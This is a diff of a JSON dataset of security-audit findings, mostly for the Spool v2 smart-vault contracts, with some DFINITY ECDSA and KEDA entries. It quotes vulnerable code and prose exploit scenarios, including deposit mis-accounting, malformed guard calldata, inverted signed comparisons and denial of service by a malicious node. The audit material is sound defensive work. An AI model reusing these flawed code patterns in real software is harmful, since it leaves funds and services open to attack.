This will prevent situations in which certain users get rewards while others do not.", + "title": "9. Incorrect bookkeeping of assets deposited into smart vaults ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Assets deposited by users into smart vaults are incorrectly tracked. As a result, the assets deposited into a smart vault's strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies. When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault flush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current flush cycle instead of the sum of all deposits (figure 9.1).
function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2)
    external
    onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
    returns (uint256[] memory, uint256)
{
    ...
    // transfer tokens from user to master wallet
    for (uint256 i; i < bag2.tokens.length; ++i) {
        _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i];
    }
    ...
Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379-L439 The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function.
function flushSmartVault(
    address smartVault,
    uint256 flushIndex,
    address[] calldata strategies,
    uint16a16 allocation,
    address[] calldata tokens
) external returns (uint16a16) {
    _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender);
    if (_vaultDeposits[smartVault][flushIndex][0] == 0) {
        return uint16a16.wrap(0);
    }
    // handle deposits
    uint256[] memory exchangeRates = SpoolUtils.getExchangeRates(tokens, _priceFeedManager);
    _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates);
    uint256[][] memory distribution = distributeDeposit(
        DepositQueryBag1({
            deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length),
            exchangeRates: exchangeRates,
            allocation: allocation,
            strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry)
        })
    );
    ...
    return _strategyRegistry.addDeposits(strategies, distribution);
}
Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188-L226 Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution, which adds the amounts to deploy in the next doHardWork call to the _assetsDeposited variable (figure 9.3).
function addDeposits(address[] calldata strategies_, uint256[][] calldata amounts)
    external
    onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender)
    returns (uint16a16)
{
    uint16a16 indexes;
    for (uint256 i; i < strategies_.length; ++i) {
        address strategy = strategies_[i];
        uint256 latestIndex = _currentIndexes[strategy];
        indexes = indexes.set(i, latestIndex);
        for (uint256 j = 0; j < amounts[i].length; j++) {
            _assetsDeposited[strategy][latestIndex][j] += amounts[i][j];
        }
    }
    return indexes;
}
Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343-L361 The next time the doHardWork function is called, it will transfer the equivalent of the last deposit's amount instead of the sum of all deposits from the master wallet to the assigned strategy (figure 9.4). 
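// Reviewer note (not in the original source): _assetsDeposited below holds only
// what figure 9.1 recorded, and figure 9.1 overwrites with '=' on every deposit,
// so only the flush cycle's last deposit is ever transferred.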
function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused {
    ...
    // Transfer deposited assets to the strategy.
    for (uint256 k; k < assetGroup.length; ++k) {
        if (_assetsDeposited[strategy][dhwIndex][k] > 0) {
            _masterWallet.transfer(
                IERC20(assetGroup[k]),
                strategy,
                _assetsDeposited[strategy][dhwIndex][k]
            );
        }
    }
    ...
Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222-L341 Exploit Scenario Bob deploys a smart vault. One hundred deposits are made before a smart vault flush is invoked, but only the last deposit's assets are deployed to the underlying strategies, severely impacting the smart vault's performance. Recommendations Short term, modify the depositAssets function so that it correctly tracks all deposits within a flush cycle, rather than just the last deposit. Long term, improve the system's unit and integration tests: test a smart vault with a single strategy and multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "1. Lack of validation of signed dealing against original dealing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "The EcdsaPreSignerImpl::validate_dealing_support method does not check that the content of signed dealings matches the original dealings. A malicious receiver could exploit this lack of validation by changing the requested height (that is, the support.content.requested_height field) or internal data (the support.content.idk_dealing.internal_dealing_raw field) before signing the ECDSA dealing. The resulting signature would not be flagged as invalid by the validate_dealing_support method but would result in an invalid aggregated signature. After all nodes sign a dealing, the EcdsaTranscriptBuilderImpl::build_transcript method checks the signed dealings' content hashes before attempting to aggregate all the dealing support signatures to produce the final aggregated signature. The method logs a warning when the hashes do not agree, but does not otherwise act on signed dealings with different content.
let mut content_hash = BTreeSet::new();
for share in &support_shares {
    content_hash.insert(ic_crypto::crypto_hash(&share.content));
}
if content_hash.len() > 1 {
    warn!(
        self.log,
        \"Unexpected multi share content: support_shares = {}, content_hash = {}\",
        support_shares.len(),
        content_hash.len()
    );
    self.metrics.payload_errors_inc(\"invalid_content_hash\");
}
if let Some(multi_sig) = self.crypto_aggregate_dealing_support(
    transcript_state.transcript_params,
    &support_shares,
) {
    transcript_state.add_completed_dealing(signed_dealing.content, multi_sig);
}
Figure 1.1: ic/rs/consensus/src/ecdsa/pre_signer.rs:1015-1034 The dealing content is added to the set of completed dealings along with the aggregated signature. When the node attempts to create a new transcript from the dealing, the aggregated signature is checked by IDkgProtocol::create_transcript. If a malicious receiver changes the content of a dealing before signing it, the resulting invalid aggregated signature would be rejected by this method. In such a case, the EcdsaTranscriptBuilderImpl methods build_transcript and get_completed_transcript would return None for the corresponding transcript ID. That is, neither the transcript nor the corresponding quadruple would be completed. 
Additionally, since signing requests are deterministically matched against quadruples, including quadruples that are not yet available, this issue could allow a single node to block the service of individual signing requests.
pub(crate) fn get_signing_requests<'a>(
    ecdsa_payload: &ecdsa::EcdsaPayload,
    sign_with_ecdsa_contexts: &'a BTreeMap<CallbackId, SignWithEcdsaContext>,
) -> BTreeMap<ecdsa::RequestId, &'a SignWithEcdsaContext> {
    let known_random_ids: BTreeSet<[u8; 32]> = ecdsa_payload
        .iter_request_ids()
        .map(|id| id.pseudo_random_id)
        .collect::<BTreeSet<_>>();
    let mut unassigned_quadruple_ids = ecdsa_payload.unassigned_quadruple_ids().collect::<Vec<_>>();
    // sort in reverse order (bigger to smaller).
    unassigned_quadruple_ids.sort_by(|a, b| b.cmp(a));
    let mut new_requests = BTreeMap::new();
    // The following iteration goes through contexts in the order
    // of their keys, which is the callback_id. Therefore we are
    // traversing the requests in the order they were created.
    for context in sign_with_ecdsa_contexts.values() {
        if known_random_ids.contains(context.pseudo_random_id.as_slice()) {
            continue;
        };
        if let Some(quadruple_id) = unassigned_quadruple_ids.pop() {
            let request_id = ecdsa::RequestId {
                quadruple_id,
                pseudo_random_id: context.pseudo_random_id,
            };
            new_requests.insert(request_id, context);
        } else {
            break;
        }
    }
    new_requests
}
Figure 1.2: ic/rs/consensus/src/ecdsa/payload_builder.rs:752-782 Exploit Scenario A malicious node wants to prevent the signing request SRi from completing. Assume that the corresponding quadruple, Qi, is not yet available. The node waits until it receives a dealing corresponding to quadruple Qi. It generates a support message for the dealing, but before signing the dealing, the malicious node changes the dealing.idk_dealing.internal_dealing_raw field. The signature is valid for the updated dealing but not for the original dealing. The malicious dealing support is gossiped to the other nodes in the network. Since the signature on the dealing support is correct, all nodes move the dealing support to the validated pool. However, when the dealing support signatures are aggregated by the other nodes, the aggregated signature is rejected as invalid, and no new transcript is created for the dealing. This means that the quadruple Qi never completes. Since the matching of signing requests to quadruples is deterministic, SRi is matched with Qi every time a new ECDSA payload is created. Thus, SRi is never serviced. Recommendations Short term, add validation code in EcdsaPreSignerImpl::validate_dealing_support to verify that a signed dealing's content hash is identical to the hash of the original dealing. Long term, consider whether the BLS multisignature aggregation APIs need to be better documented to ensure that API consumers verify that all individual signatures are over the same message.", + "title": "10. Risk of malformed calldata of calls to guard contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the affected guard contract to give incorrect results or to always revert calls. Guards for vaults are customizable checks that are executed on every user action. The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (figure 10.1). 
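// Reviewer note (not in the original source): 'encoded' below is assembled by
// _encodeFunctionCall (figure 10.2), which concatenates the configured custom
// values as-is; nothing verifies they are padded to 32-byte words.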
function runGuards(address smartVaultId, RequestContext calldata context) external view {
    [...]
    bytes memory encoded = _encodeFunctionCall(smartVaultId, guard, context);
    (bool success, bytes memory data) = guard.contractAddress.staticcall(encoded);
    _checkResult(success, data, guard.operator, guard.expectedValue, i);
    }
}
Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19-L33 The arguments of the runGuards function include information related to the given user action and custom values defined at the time of guard definition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard definition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (figure 10.2).
function _encodeFunctionCall(address smartVaultId, GuardDefinition memory guard, RequestContext memory context)
    internal
    pure
    returns (bytes memory)
{
    [...]
    result = bytes.concat(result, methodID);
    for (uint256 i; i < paramsLength; ++i) {
        GuardParamType paramType = guard.methodParamTypes[i];
        if (paramType == GuardParamType.DynamicCustomValue) {
            result = bytes.concat(result, abi.encode(paramsEndLoc));
            paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length;
            customValueIdx++;
        } else if (paramType == GuardParamType.CustomValue) {
            result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
            customValueIdx++;
        }
        [...]
    }
    customValueIdx = 0;
    for (uint256 i; i < paramsLength; ++i) {
        GuardParamType paramType = guard.methodParamTypes[i];
        if (paramType == GuardParamType.DynamicCustomValue) {
            result = bytes.concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32));
            result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
            customValueIdx++;
        } else if (paramType == GuardParamType.CustomValue) {
            customValueIdx++;
        }
        [...]
    }
    return result;
}
Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111-L177 However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen: 1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable. 2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected. Exploit Scenario Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard definition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable. Recommendations Short term, modify the associated code so that it verifies that custom values are properly padded before guard definitions are initialized in GuardManager.setGuards. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. (A brief illustration of the padding requirement follows.) 
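As an illustration (an editorial sketch, not from the report): each head slot in ABI-encoded calldata is one 32-byte word, so a custom value stored with fewer than 32 bytes shifts every argument after it.
bytes memory padded = abi.encode(uint16(42));         // one full word, 0x00...002a; safe to concatenate
bytes memory unpadded = abi.encodePacked(uint16(42)); // two bytes, 0x002a; misaligns all later parameters
Storing only full-word values in methodParamValues keeps the manually built calldata aligned; the unpadded form reproduces the failure modes described above.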
Additionally, improve the user documentation with necessary technical details to properly use the system.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { - "title": "2. The ECDSA payload is not updated if a quadruple fails to complete ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "If a transcript fails to complete (as described in TOB-DFTECDSA-1), the corresponding quadruple, Qi, will also fail to complete. This means that the quadruple ID for Qi will remain in the quadruples_in_creation set until the key is reshared and the set is purged. (Currently, the key is reshared if a node joins or leaves the subnet, which is an uncommon occurrence.) Moreover, if a transcript and the corresponding Qi fail to complete, so will the corresponding signing request, SRi, as it is matched deterministically with Qi.
let ecdsa_payload = ecdsa::EcdsaPayload {
    signature_agreements: ecdsa_payload.signature_agreements.clone(),
    ongoing_signatures: ecdsa_payload.ongoing_signatures.clone(),
    available_quadruples: if is_new_key_transcript {
        BTreeMap::new()
    } else {
        ecdsa_payload.available_quadruples.clone()
    },
    quadruples_in_creation: if is_new_key_transcript {
        BTreeMap::new()
    } else {
        ecdsa_payload.quadruples_in_creation.clone()
    },
    uid_generator: ecdsa_payload.uid_generator.clone(),
    idkg_transcripts: BTreeMap::new(),
    ongoing_xnet_reshares: if is_new_key_transcript {
        // This will clear the current ongoing reshares, and
        // the execution requests will be restarted with the
        // new key and different transcript IDs.
        BTreeMap::new()
    } else {
        ecdsa_payload.ongoing_xnet_reshares.clone()
    },
    xnet_reshare_agreements: ecdsa_payload.xnet_reshare_agreements.clone(),
};
Figure 2.1: The quadruples_in_creation set will be purged only when the key is reshared. The canister will never be notified that the signing request failed and will be left waiting indefinitely for the corresponding reply from the distributed signing service. Recommendations Short term, revise the code so that if a transcript (permanently) fails to complete, the quadruple ID and corresponding transcripts are dropped from the ECDSA payload. To ensure that a malicious node cannot influence how signing requests are matched with quadruples, revise the code so that it notifies the canister that the signing request failed.", + "title": "11. GuardManager does not account for all possible types when encoding guard arguments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for fixed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior. The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (figure 11.1). 
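// Reviewer note (not in the original source): the offset bookkeeping below
// (paramsEndLoc = paramsLength * 32) assumes each head parameter occupies one
// 32-byte slot; a fixed-size static array or static struct occupies several.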
function _encodeFunctionCall(address smartVaultId, GuardDefinition memory guard, RequestContext memory context)
    internal
    pure
    returns (bytes memory)
{
    bytes4 methodID = bytes4(keccak256(abi.encodePacked(guard.methodSignature)));
    uint256 paramsLength = guard.methodParamTypes.length;
    bytes memory result = new bytes(0);
    result = bytes.concat(result, methodID);
    uint16 customValueIdx = 0;
    uint256 paramsEndLoc = paramsLength * 32;
    // Loop through parameters and
    // - store values for simple types
    // - store param value location for dynamic types
    for (uint256 i; i < paramsLength; ++i) {
        GuardParamType paramType = guard.methodParamTypes[i];
        if (paramType == GuardParamType.DynamicCustomValue) {
            result = bytes.concat(result, abi.encode(paramsEndLoc));
            paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length;
            customValueIdx++;
        } else if (paramType == GuardParamType.CustomValue) {
            result = bytes.concat(result, guard.methodParamValues[customValueIdx]);
            customValueIdx++;
        }
        [...]
        else if (paramType == GuardParamType.Assets) {
            result = bytes.concat(result, abi.encode(paramsEndLoc));
            paramsEndLoc += 32 + context.assets.length * 32;
        } else if (paramType == GuardParamType.Tokens) {
            result = bytes.concat(result, abi.encode(paramsEndLoc));
            paramsEndLoc += 32 + context.tokens.length * 32;
        } else {
            revert InvalidGuardParamType(uint256(paramType));
        }
    }
    [...]
    return result;
}
Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111-L177 The function calculates the offset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, fixed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated offset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions, or revert every call. Exploit Scenario Bob deploys a smart vault and creates a guard contract that takes the custom value of a fixed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard definition in GuardManager, but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution. Recommendations Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the offsets correctly. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "3. Malicious canisters can exhaust the number of available quadruples ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "By requesting a large number of signatures, a canister (or set of canisters) could exhaust the number of available quadruples, preventing other signature requests from completing in a timely manner. 
The ECDSA payload builder defaults to creating one extra quadruple in create_data_payload if there is no ECDSA configuration for the subnet in the registry.
let ecdsa_config = registry_client
    .get_ecdsa_config(subnet_id, summary_registry_version)?
    .unwrap_or(EcdsaConfig {
        quadruples_to_create_in_advance: 1, // default value
        ..EcdsaConfig::default()
    });
Figure 3.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:400-405 Signing requests are serviced by the system in the order in which they are made (as determined by their CallbackID values). If a canister (or set of canisters) makes a large number of signing requests, the system would be overwhelmed and would take a long time to recover. This issue is partly mitigated by the fee that is charged for signing requests. However, we believe that the financial ramifications of this problem could outweigh the fees paid by attackers. For example, the type of denial-of-service attack described in this finding could be devastating for a DeFi application that is sensitive to small price fluctuations in the Bitcoin market. Since the ECDSA threshold signature service is not yet deployed on the Internet Computer, it is unclear how the service will be used in practice, making the severity of this issue difficult to determine. Therefore, the severity of this issue is marked as undetermined. Exploit Scenario A malicious canister learns that another canister on the Internet Computer is about to request a time-sensitive signature on a message. The malicious canister immediately requests a large number of signatures from the signing service, exhausting the number of available quadruples and preventing the original signature from completing in a timely manner. Recommendations One possible mitigation is to increase the number of quadruples that the system creates in advance, making it more expensive for an attacker to carry out a denial-of-service attack on the ECDSA signing service. Another possibility is to run multiple signing services on multiple subnets of the Internet Computer. This would have the added benefit of protecting the system from resource exhaustion related to cross-network bandwidth limitations. However, both of these solutions scale only linearly with the number of added quadruples/subnets. Another potential mitigation is to introduce a dynamic fee or stake based on the number of outstanding signing requests. In the case of a dynamic fee, the canister would pay a set number of tokens proportional to the number of outstanding signing requests whenever it requests a new signature from the service. In the case of a stake-based system, the canister would stake funds proportional to the number of outstanding requests but would recover those funds once the signing request completed. As any signing service that depends on consensus will have limited throughput compared to a centralized service, this issue is difficult to mitigate completely. However, it is important that canister developers are aware of the limits of the implementation. Therefore, regardless of the mitigations imposed, we recommend that the DFINITY team clearly document the limits of the current implementation.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "4. 
Aggregated signatures are dropped if their request IDs are not recognized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", - "body": "The update_signature_agreements function populates the set of completed signatures in the ECDSA payload. The function aggregates the completed signatures from the ECDSA pool by calling EcdsaSignatureBuilderImpl::get_completed_signatures. However, if a signature's associated signing request ID is not in the set of ongoing signatures, update_signature_agreements simply drops the signature.
for (request_id, signature) in builder.get_completed_signatures(chain, ecdsa_pool.deref()) {
    if payload.ongoing_signatures.remove(&request_id).is_none() {
        warn!(
            log,
            \"ECDSA signing request {:?} is not found in payload but we have a signature for it\",
            request_id
        );
    } else {
        payload
            .signature_agreements
            .insert(request_id, ecdsa::CompletedSignature::Unreported(signature));
    }
}
Figure 4.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:817-830 Barring an implementation error, this should not happen under normal circumstances. Recommendations Short term, consider adding the signature to the set of completed signatures on the next ECDSA payload. This will ensure that all outstanding signing requests are completed. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: High" ] }, { + "title": "12. Use of encoded values in guard contract comparisons could lead to opposite results ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators. The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (figure 12.1).
function _checkResult(
    bool success,
    bytes memory returnValue,
    bytes2 operator,
    bytes32 value,
    uint256 guardNum
) internal pure {
    if (!success) revert GuardError();
    bool result = true;
    if (operator == bytes2(\"==\")) {
        result = abi.decode(returnValue, (bytes32)) == value;
    } else if (operator == bytes2(\"<=\")) {
        result = abi.decode(returnValue, (bytes32)) <= value;
    } else if (operator == bytes2(\">=\")) {
        result = abi.decode(returnValue, (bytes32)) >= value;
    } else if (operator == bytes2(\"<\")) {
        result = abi.decode(returnValue, (bytes32)) < value;
    } else if (operator == bytes2(\">\")) {
        result = abi.decode(returnValue, (bytes32)) > value;
    } else {
        result = abi.decode(returnValue, (bool));
    }
    if (!result) revert GuardFailed(guardNum);
}
Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80-L105 When a smart vault creator defines a guard using the GuardManager.setGuards function, they define a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the first 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type. 
First, the numerical comparison operators (<, >, <=, >=) are not well defined for bytes32; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type. The Solidity documentation includes the following description of the encoding of int type values: int<M>: enc(X) is the big-endian two's complement encoding of X, padded on the higher-order (left) side with 0xff bytes for negative X and with zero bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description of the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00, the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the first 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. Bob uses the B contract as a guard with the comparison operator > and an expected value of 0. Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[]. The first 32 bytes of the return data contain the offset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bob's smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Medium" ] }, { - "title": "1. Use of fmt.Sprintf to build host:port string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identifier. An address created using simple string concatenation, such as with fmt.Sprintf, may fail to parse when given to Go standard library functions. The following source files incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port. 
If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port. Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue. 2. MongoDB scaler does not encode username and password in connection string Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-KEDA-2 Target: pkg/scalers/mongo_scaler.go", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { + "title": "13. Lack of contract existence checks on low-level calls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (figure 13.1).
function swap(
    address[] calldata tokensIn,
    SwapInfo[] calldata swapInfo,
    address[] calldata tokensOut,
    address receiver
) external returns (uint256[] memory tokenAmounts) {
    // Perform the swaps.
    for (uint256 i; i < swapInfo.length; ++i) {
        if (!exchangeAllowlist[swapInfo[i].swapTarget]) {
            revert ExchangeNotAllowed(swapInfo[i].swapTarget);
        }
        _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget);
        (bool success, bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData);
        if (!success) revert(SpoolUtils.getRevertMsg(data));
    }
    // Return unswapped tokens.
    for (uint256 i; i < tokensIn.length; ++i) {
        uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf(address(this));
        if (tokenInBalance > 0) {
            IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance);
        }
    }
Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29-L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this finding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful. However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (figure 13.3). 
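// Reviewer note (not in the original source): if swapper.swap below hits a
// destroyed or wrong swapTarget, the low-level call still reports success; the
// COMP comes back unswapped, swappedAmount is 0, and nothing is compounded.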
function _compound(
    address[] calldata tokens,
    SwapInfo[] calldata swapInfo,
    uint256[] calldata
) internal override returns (int256 compoundedYieldPercentage) {
    if (swapInfo.length > 0) {
        address[] memory markets = new address[](1);
        markets[0] = address(cToken);
        comptroller.claimComp(address(this), markets);
        uint256 compBalance = comp.balanceOf(address(this));
        if (compBalance > 0) {
            comp.safeTransfer(address(swapper), compBalance);
            address[] memory tokensIn = new address[](1);
            tokensIn[0] = address(comp);
            uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0];
            if (swappedAmount > 0) {
                uint256 cTokenBalanceBefore = cToken.balanceOf(address(this));
                _depositToCompoundProtocol(IERC20(tokens[0]), swappedAmount);
                uint256 cTokenAmountCompounded = cToken.balanceOf(address(this)) - cTokenBalanceBefore;
                compoundedYieldPercentage = _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded);
            }
        }
    }
}
Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol If the swap operation fails, the COMP will stay in CompoundV2Strategy. This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the do hard worker may not notice that yield is not compounding. As a result, users will receive less in profit than they otherwise would have. The GuardManager.runGuards function, which uses the address().staticcall() function, is also affected by this issue. However, the return value of the call is decoded, so the calls would not fail silently. Exploit Scenario The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy, the do hard worker sets the swapTarget address to an incorrect address. The swap operation to exchange COMP to the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in profit. Recommendations Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap. Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation, particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "3. Prometheus metrics server does not support TLS ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not offer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer, does so using the http.ListenAndServe function, which does not enable TLS. 
func (metricsServer PrometheusMetricServer) NewServer(address string, pattern string) {
    http.HandleFunc(\"/healthz\", func(w http.ResponseWriter, _ *http.Request) {
        w.WriteHeader(http.StatusOK)
        _, err := w.Write([]byte(\"OK\"))
        if err != nil {
            log.Fatalf(\"Unable to write to serve custom metrics: %v\", err)
        }
    })
    log.Printf(\"Starting metrics server at %v\", address)
    http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{}))
    // initialize the total error metric
    _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{})
    if errscaler != nil {
        log.Fatalf(\"Unable to initialize total error metrics as : %v\", errscaler)
    }
    log.Fatal(http.ListenAndServe(address, nil))
}
